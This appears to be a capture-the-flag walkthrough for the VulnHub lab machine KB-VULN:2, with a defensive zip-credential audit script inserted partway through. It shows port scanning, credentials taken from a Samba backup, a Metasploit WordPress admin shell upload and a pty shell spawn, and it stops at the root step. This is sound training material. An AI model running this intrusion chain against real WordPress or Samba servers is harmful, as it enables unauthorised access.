Hello friends, hope you are all doing great. This is a walkthrough for the machine KB-VULN:2, which is a good start for beginners. The machine was created by Machineboy and you can simply download it from VulnHub.
#Make sure to add the machine's address to your hosts file.
#nmap
$nmap -sV kb.vuln
Nmap scan report for kb.vuln (192.168.1.6)
Host is up (0.00031s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Tried anonymous login over FTP, but it doesn't work. Port 80 is also open, so ran dirb and got the following result.
$dirb http://kb.vuln

Tried brute-forcing the WordPress login, but no luck. Then noticed the Samba service and dug into it via smb://kb.vuln, and got a username and password from backup.zip, which contains remerber_me.txt.
Username:admin Password:MachineBoy141
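As an added example (not part of the original walkthrough): a defender-side audit that walks a share's export directory and reports zip archives holding credential-like lines, the kind of leftover backup found above. The regex, function names and sample archive contents are assumptions constructed for illustration.

```python
import io
import re
import zipfile
from pathlib import Path

# Lines such as "Username:admin" or "password = x" (pattern is an assumption; tune per site).
CRED_RE = re.compile(r"(?i)\b(user(?:name)?|login|pass(?:word|wd)?)\s*[:=]\s*\S+")
MAX_MEMBER_BYTES = 1_000_000  # skip large members to bound memory use

def scan_zip(data, label):
    """Return (archive, member, line_no, key) per credential-like line; values are not returned."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with archive:
        for info in archive.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                continue
            if info.flag_bits & 0x1:  # encrypted member: report it, contents cannot be inspected
                findings.append((label, info.filename, 0, "encrypted"))
                continue
            text = archive.read(info).decode("utf-8", errors="replace")
            for line_no, line in enumerate(text.splitlines(), 1):
                match = CRED_RE.search(line)
                if match:
                    findings.append((label, info.filename, line_no, match.group(1).lower()))
    return findings

def scan_share(root):
    """Walk an exported share directory and scan every zip archive found in it."""
    results = []
    for path in Path(root).rglob("*.zip"):
        results.extend(scan_zip(path.read_bytes(), str(path)))
    return results

def constructed_sample():
    """Build an in-memory archive with made-up contents for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes/readme.txt", "Nightly backup of the web root.\n")
        zf.writestr("notes/login.txt", "Username:alice\nPassword:Example123\n")
    return buf.getvalue()

if __name__ == "__main__":
    for finding in scan_zip(constructed_sample(), "sample.zip"):
        print(finding)
```

Run `scan_share()` against the directory a share exports; any hit means the archive should be removed from the share and the listed credentials rotated.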
#exploitation
Now that we have credentials, there are different ways to upload a backdoor; here is one of the simplest ways to upload a shell, using metasploit-framework.
msf> use exploit/unix/webapp/wp_admin_shell_upload
msf> show options
msf> set rhosts kb.vuln //set all the required options
msf> run

#user
Got a shell! The first flag is in the kbadmin folder, which is readable as the www-data user; we also already have the credentials kbadmin:MachineBoy141.
Use Python to get a tty:
python -c 'import pty; pty.spawn("/bin/sh")'
cd /home/kbadmin
and got the user flag.

#root
For root, simply tried sudo -l
